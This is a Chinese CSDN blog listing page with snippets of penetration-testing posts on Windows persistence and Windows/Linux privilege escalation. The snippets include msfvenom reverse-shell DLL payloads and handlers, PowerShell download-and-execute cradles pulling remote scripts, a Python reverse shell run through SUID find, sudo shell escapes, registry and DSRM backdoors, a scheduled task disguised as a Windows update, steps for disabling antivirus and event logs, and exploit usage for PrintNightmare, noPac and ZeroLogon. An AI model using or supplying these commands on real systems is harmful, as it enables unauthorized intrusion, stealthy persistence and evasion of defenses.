Pluto－2003-优快云博客

原创 WEB渗透权限维持篇-通过自定义.net垃圾回收机制进行DLL注入

低权限用户可指定.net应用程序使用自定义垃圾收集器（GC），一个自定义GC可以以COMPLUS_GCName此环境变量指定，只需将此环境变量指向到恶意DLL，自定义GC的DLL需要一个名为GC_VersionInfo的导出表。下面是个弹框DLL

2024-09-15 23:54:54 318

原创 WEB渗透权限维持篇-DSRM+注册表ACL后门

>reg add HKLM\System\CurrentControlSet\Control\Lsa /v DSRMAdminLogonBehavior /t REG_DWORD /d 2允许DSRM账户远程访问https://github.com/HarmJ0y/DAMP效果：域内任何用户可读取域控hashsystem权限执行>psexec.exe -accepteula -s -i -d cmd.exe域控制器执行PS>Add-RemoteRegBackdoor -ComputerName

2024-09-15 23:53:10 429

原创 WEB渗透权限维持篇-通过控制面板加载项维持权限

#include #include "pch.h"//Cplappletextern "C" __declspec(dllexport) LONG Cplapplet( HWND hwndCpl, UINT msg, LPARAM lParam1, LPARAM lParam2){ MessageBoxA(NULL, "inject control panel.", "Control Panel", 0); return 1;

2024-09-13 23:31:00 429

原创 WEB渗透权限维持篇-进程注入

注册表HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\SessionManager\下新建AppCertDlls，新建名字为Default，值为c:\1.dll的项#msfvenom –p windows/meterpreter/reverse_tcp LHOST=192.168.1.1 LPORT=4444 –f dll >/root/1.dllMsf>use exploit/multi/handlerMsf>set payload windo

2024-09-13 23:27:49 382

原创 WEB渗透权限维持篇-关闭防病毒软件

https://mrd0x.com/cortex-xdr-analysis-and-bypass/卸载密码：Password1Password hash is located in C:\ProgramData\Cyvera\LocalSystem\Persistence\agent_settings.dbLook for PasswordHash, PasswordSalt or password, salt strings.禁用Cortex：将DLL改成随机值，然后重启reg add HKE

2024-09-13 23:24:42 481

原创 WEB渗透权限维持篇-隐藏windows服务

Translate from: https://www.sans.org/blog/red-team-tactics-hiding-windows-services/Windows的一个功能允许红队或攻击者将服务隐藏起来，从而为逃避基于主机的常见威胁搜寻技术的检测提供了机会。这里假设Fax服务是我们的恶意文件或后门打开services.msc可以看到服务

2024-09-11 21:58:14 374

原创 WEB渗透权限维持篇-映像劫持

计算机\HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe 新建DWORD值GlobalFlag 16进制为200创建：计算机\HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\sethc.exe字符串值：MonitorProcess=mum

2024-09-11 21:55:03 378

原创 WEB渗透权限维持篇-DLL注入-进程挖空(MitreT1055.012)

第 2 步：交换其内存内容（取消映射/挖空）：NtUnmapViewOfSection()可以使用以下方法完成：NtQueryProcessInformation + ReadProcessMemory此外，可以使用单个函数轻松完成：ReadRemotePEB(pProcessInfo->hProcess) PPEB pPEB = ReadRemotePEB(pProcessInfo->hProcess);从 PEB 的图像地址读取 NT Headers 格式（从 PE 结构）。这是必不可少的，

2024-09-10 12:20:10 342

原创 WEB渗透权限维持篇-禁用Windows事件日志

从上面的屏幕截图中，尚不清楚哪个进程真正托管了该服务，但是如果我们继续在Process Hacker中逐个检查进程，我们最终将找到托管该服务的进程，当前为pid 2196：EventLog svchost.exe

2024-09-10 12:19:16 318

原创 WEB渗透权限维持篇-MSSQL后门

http://192.168.0.107/ps/Powershellery/Stable-ish/MSSQL/Invoke-SqlServer-Persist-StartupSp.psm1>powershell -ep bypass >IEX (New-Object Net.WebClient).DownloadString('http://192.168.0.107/ps/Powershellery/Stable-ish/MSSQL/Invoke-SqlServer-Persist-StartupSp

2024-09-10 12:17:37 477

原创 WEB渗透权限维持篇-DLL注入-修改内存中的PE头

将修改新创建进程内存中的 PE 标头，以将我们自己的 DLL 添加到导入描述符列表中1 使用带有 CREATE_SUSPENDED 标志的 CreateProcess 创建目标 EXE 进程的挂起实例。2 计算目标EXE的基地址，使用NtQueryInformationProcess读取目标进程的PEB地址，使用ReadProcessMemory读取ImageBaseAddress字段值。3 使用 ReadProcessMemory 从目标进程读取主 PE 头（IMAGE_NT_HEADERS）

2024-09-09 18:12:24 387

原创 goby/xray批量导入自定义poc（附2024红队POC）

找到include_poc参数，修改为include_poc: [poc-xray/*]xray批量导入自定义POC（附2024最新xrayPOC）直接把poc解压到xray.exe同一目录下。然后修改config.yaml文件。然后启动xray看效果。在这个路径下解压poc。

2024-09-09 18:00:14 5005 7

原创 WEB渗透权限维持篇-计划任务

创建计划任务>schtasks /create /RL HIGHEST /F /tn "windowsupdate" /tr "c:\windows\temp\update.exe" /sc DAILY /mo 1 /ST 12:25 /RU SYSTEM查看计划任务>schtasks /query | findstr "windowsupdate"立即执行某项计划任务>schtasks /run /tn "windowsupdate"删除某项计划任务>schtasks /delete /F

2024-09-08 14:53:23 224

原创 WEB渗透权限维持篇-CLR-Injection

计算机\HKEY_CURRENT_USER\Software\Classes\CLSID添加项{11111111-1111-1111-1111-111111111111}和它的子项InprocServer32 新建一个键ThreadingModel，键值为：Apartment，默认键值为dll路径劫持explorer.exe。WMIC可替换为powershell。

2024-09-08 14:50:59 251

原创 WEB渗透权限维持篇-DLL注入\劫持

生成DLL>msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.0.105 LPORT=6666 -f dll -o /var/www/html/x.dll>use exploit/multi/handler>set payload windows/x64/meterpreter/reverse_tcp>Powershell -nop -exec bypass -c "IEX (New-Object Net.WebClient)

2024-09-08 14:47:24 425

原创 WEB渗透Linux提权篇-MYSQL漏洞提权

版本MariaDB < 5.5.52 < 10.1.18 < 10.0.28MySQL

2024-09-06 23:23:53 674

原创 WEB渗透Linux提权篇-SUID提权

$touch xxx$/usr/bin/find xxx –exec whoami \;$/usr/bin/find xxx –exec python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.1.2",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.filen

2024-09-06 23:22:17 333

原创 WEB渗透Linux提权篇-Sudo提权

>sudo -l 查看/home/user/.sudo_as_admin_successful>sudo zip /tmp/test.zip /tmp/test -T --unzip-command="sh -c /bin/bash">sudo tar cf /dev/null testfile --checkpoint=1 --checkpoint-action=exec=/bin/bash>sudo strace –o /dev/null /bin/bash>sudo nmap –inter

2024-09-05 14:45:26 458

原创 WEB渗透Linux提权篇-通配符提权

存在一个定时压缩目录的任务生成反向shell。即可返回shell 或使用sudoer。低权限登录查看cron。

2024-09-05 14:40:08 351

原创 WEB渗透Linux提权篇-漏洞提权

检查执行命令所需时间>time dbus-send --system --dest=org.freedesktop.Accounts --type=method_call --print-reply /org/freedesktop/Accounts org.freedesktop.Accounts.CreateUser string:ignite string:"ignite user" int32:1提前结束(多运行几次)>dbus-send --system --dest=org.freedes

2024-09-04 10:12:18 342

原创 WEB渗透Linux提权篇-查找辅助信息

>cat /etc/issue>cat /etc/*-release>cat /etc/lsb-release # Debian based>cat /etc/redhat-release # Redhat based>cat /proc/version>uname -a>uname -mrs>rpm -q kernel>dmesg | grep Linux>ls /boot | grep vmlinuz-

2024-09-04 09:56:35 342

原创 WEB渗透Linux提权篇-可写文件提权

$ls –lh /etc/passwd 若是任何用户可读写$perl -le 'print crypt("password@123","addedsalt")' 生成密码或php -r "print(crypt('aarti','123') . \"\n\");"或python -c 'import crypt; print crypt.crypt("pass", "$6$salt")'$echo "test:advwtv/9yU5yQ:0:0:User_like_root:/root:/bin/bas

2024-09-04 09:50:51 609

原创 WEB渗透Linux提权篇-环境变量提权

编译>gcc demo.c -o shell>chmod u+s shell执行./shell 回显ps命令提权find / -perm -u=s -type f 2>/dev/null存在脚本/home/name/script/shell>cd /tmp>echo "/bin/bash" > ps>chmod 777 ps>echo $PATH>export PATH=/tmp:$PATH>cd /home/raj/script>./shell>whoami或使用copy命

2024-09-02 11:29:55 270

原创 WEB渗透Linux提权篇-提权工具合集

用于检查可执行文件属性的 bash 脚本（如 PIE、RELRO、PaX、Canaries、ASLR、Fortify Source）枚举基本系统信息并搜索常见的权限提升向量，例如世界可写文件、错误配置、明文密码和适用的漏洞利用。检查文件权限、cron 作业（如果可见）、弱凭据等。搞个web服务提供下载。

2024-09-02 11:26:22 2448

原创 WEB渗透Win提权篇-合集（下）

使用cmdkey列出机器上存储的凭据>cmdkey /listCurrently stored credentials: Target: Domain:interactive=WORKGROUP\Administrator Type: Domain Password User: WORKGROUP\Administrator可以使用runas的/savecred参数以使用保存的凭据。以下示例通过 SMB 共享调用远程可执行文件>runas /savecred /user:WORKGROUP\A

2024-09-01 11:28:18 507

原创 WEB渗透Win提权篇-合集（上）

Rogue Potatohttps://github.com/antonioCoco/RoguePotato要在远程机器上运行端口转发，必须使用端口 135 作为源端口socat tcp-listen:135,reuseaddr,fork tcp:10.0.0.3:9999在远程计算机上运行 RogueOxidResolver.exe如果您有防火墙限制，请使用此选项RoguePotato.exe -r 10.0.0.3 -e "C:\windows\system32\cmd.exe"Rog

2024-09-01 11:26:05 582

原创 WEB渗透Win提权篇-PrintNightmare

https://github.com/cube0x0/CVE-2021-1675>python3 ./CVE-2021-1675.py hackit.local/domain_user:Pass123@192.168.1.10 '\\192.168.1.215\smb\addCube.dll'>python3 ./CVE-2021-1675.py hackit.local/domain_user:Pass123@192.168.1.10 'C:\addCube.dll'本地执行溢出>SharpPri

2024-08-30 22:49:49 790

原创 WEB渗透Win提权篇-Searchsploit

wmic qfe list full|findstr /i hotfixsysteminfo>temp.txt&(for %i in (KB2271195 KB2124261 KB2160329 KB2621440 KB2707511 KB2829361 KB2864063 KB3000061 KB3045171 KB3036220 KB3077657 KB3079904 KB3134228 KB3124280 KB3199135) do @type temp.txt|@find /i "%i"||

2024-08-30 22:48:49 744

原创 WEB渗透Win提权篇-白名单提权

>C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /r:System.EnterpriseServices.dll /r:System.IO.Compression.dll /target:library /out:y.exe /unsafe C:\Users\y\Desktop\1.csusing System;using System.Net;using System.Linq;using System.Net.Sockets;us

2024-08-29 10:59:37 236

原创 WEB渗透Win提权篇-CVE-2020-1472

使用 IP 地址代替FQDN 用 Windows API 来强制 NTLM 重置密码为Waza1234/Waza1234/Waza1234/从 secretsdump 恢复密码将本地注册表机密转储到最新版本时,secretsdump 将自动转储明文机器密码（十六进制编码）激活一个虚拟环境来安装impacket。查找 DC 的旧 NT 哈希。执行dcsync导出hash。从一个没加入域的机器测试。执行，并且设置密码为空。

2024-08-29 10:51:01 279

原创 WEB渗透Win提权篇-MSF提权

发现补丁>use post/windows/gather/enum_patches列举可用EXP>use post/multi/recon/local_exploit_suggester

2024-08-28 15:48:22 268

原创 WEB渗透Win提权篇-特权文件写入提权

此技巧不再适用于最新版本的 Windows 10 Insider Preview如果我们在 Windows 或某些第三方软件中发现了一个特权文件写入漏洞，可以将我们自己的windowscoredeviceinfo.dll复制到C:\Windows\Sytem32\，然后由 USO 服务加载，以NT AUTHORITY\System执行任意代码构建https://github.com/itm4n/UsoDllLoader选择发布配置和 x64 架构。构建解决方案。DLL .\x64\Release\

2024-08-28 15:45:12 280

原创 WEB渗透Win提权篇-PowerUp

检测有漏洞的服务在AbuseFunction中会显示利用语句。重启电脑后会新增用户admin查找可能劫持的进程查找环境变量中当前用户可修改的目录查找存在注册表中自动登录用户的平局查询trusted_service_path查询当前用户可修改的注册表开机启动项查询当前用户可修改的计划任务项查询系统中所有web.config文件中的明文密码。

2024-08-27 19:47:45 255

原创 WEB渗透Win提权篇-BypassUAC

提权工具合集包（免费分享）：夸克网盘分享WEB渗透Win提权篇-RDP&Firewall-优快云博客WEB渗透Win提权篇-MSSQL-优快云博客WEB渗透Win提权篇-MYSQL-udf-优快云博客WEB渗透Win提权篇-AccountSpoofing-优快云博客WEB渗透Win提权篇-弱权限提权-优快云博客 DccwBypassUACCMSTPBypass-UACDLL hijackSilentClean

2024-08-27 19:43:26 322

原创 WEB渗透Win提权篇-弱权限提权

提权工具合集包：夸克网盘分享WEB渗透Win提权篇-提权工具合集-优快云博客WEB渗透Win提权篇-RDP&Firewall-优快云博客WEB渗透Win提权篇-MSSQL-优快云博客WEB渗透Win提权篇-MYSQL-udf-优快云博客WEB渗透Win提权篇-AccountSpoofing-优快云博客条件：服务帐号upnphost如果由于缺少依赖项而失败，请尝试以下命令。使用accesschk弱注册表权限检查有KEY_ALL_ACCESS权限的注册表项查询路

2024-08-26 21:57:53 307

原创 WEB渗透Win提权篇-提权工具合集

要运⾏ PowerUp，请启动 PowerShell 会话并使⽤ dot 加载脚本，请执⾏以下操。winPEAS 是⼀个⾮常强⼤的⼯具，它不仅积极寻找特权升级错误配置，⽽且还在。当使⽤命令⾏时，我们有使⽤仍具有 /accepteula 命令⾏的旧版本选项。缺点是：程序的最新版本会⽣成⼀个 GUI"接受 EULA" 弹出窗⼝。您可以使⽤它来检查⽤户或组是否有权访问⽂件，⽬录，服务和注册表项。accesschk 是⼀个很旧的⼯具了，但我们依然可以尝试去⽤。Seatbelt 是⼀种枚举⼯具。

2024-08-26 21:34:34 2858

原创 WEB渗透Win提权篇-AccountSpoofing

https://github.com/cube0x0/noPac>noPac.exe scan -domain htb.local -user user -pass 'password123'>noPac.exe -domain htb.local -user domain_user -pass 'Password123!' /dc dc.htb.local /mAccount demo123 /mPassword Password123! /service cifs /ptt>noPac.exe -

2024-08-25 20:36:43 328

原创 WEB渗透Win提权篇-MYSQL-udf

Mysql>5.1 udf.dll放置在lib\plugin Mysql

2024-08-25 16:58:47 215

原创 WEB渗透Win提权篇-MSSQL

查询状态>select count(*) from master.dbo.sysobjects where xtype='x' and name='xp_cmdshell' 存在返回1EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;exec sp_configure 'xp_cmdshell',1;reconfigure;exec maste

2024-08-24 01:07:15 283

原创 WEB渗透Win提权篇-RDP&Firewall

放行出去到远程8888端口的流量 netsh advfirewall firewall add rule name="88" protocol=TCP dir=out remoteport=8888 action=allow。放行远程8888端口进来的流量 netsh advfirewall firewall add rule name="88" protocol=TCP dir=in remoteport=8888 action=allow。本机开启3389远程连接的方法。注：修改连接端口重启后生效。

TA创建的收藏夹 TA关注的收藏夹

TA关注的人